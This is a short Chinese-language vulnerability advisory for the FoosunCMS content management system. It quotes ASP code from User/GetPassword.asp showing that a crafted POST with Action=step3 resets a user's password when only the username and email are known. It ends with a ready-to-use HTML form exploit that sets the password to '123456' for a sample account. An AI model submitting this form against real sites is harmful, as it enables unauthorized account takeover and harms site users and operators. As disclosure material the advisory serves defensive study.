风讯（FooSun）GetPassword.asp页面存在任意修改密码漏洞

FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。 在文件\User\ GetPassword.asp中： ElseIf Request.Form(&quot;Action&quot;) = &quot;step3&quot; then //第28行 Call step3() …… Sub step3() //第198行 Dim p_pass_new,p_confim_pass_new p_pass_new = md5(Request.Form(&quot;pass_new&quot;),16) …… User_Conn.execute(&quot;Update FS_ME_Users set UserPassword ='&quot;&amp; NoSqlHack(p_pass_new) &amp;&quot;' where UserName = '&quot;&amp; NoSqlHack(StrUserName) &amp;&quot;' and Email = '&quot;&amp; NoSqlHack(Replace(Request.Form(&quot;Email&quot;),&quot;''&quot;,&quot;&quot;))&amp;&quot;'&quot;) //第220行 用户可以本地构造表单使程序直接进入修改密码，只需要知道用户名和邮箱。 ### 漏洞利用: ``` <form id="form1" name="form1" method="post" action="http://wavdb.com/User/GetPassword.asp"> <input name="Action" type="text" id="Action" value="step3" /> <input name="pass_new" type="text" id="pass_new" value="123456" /> <input name="confim_pass_new" type="text" id="confim_pass_new" value="123456" /> <input name="Email" type="text" id="Email" value="bb@126.com" /> <input name="UserName" type="text" id="UserName" value="bb" /> <input type="submit" name="Submit" value="提交" /> </form> ```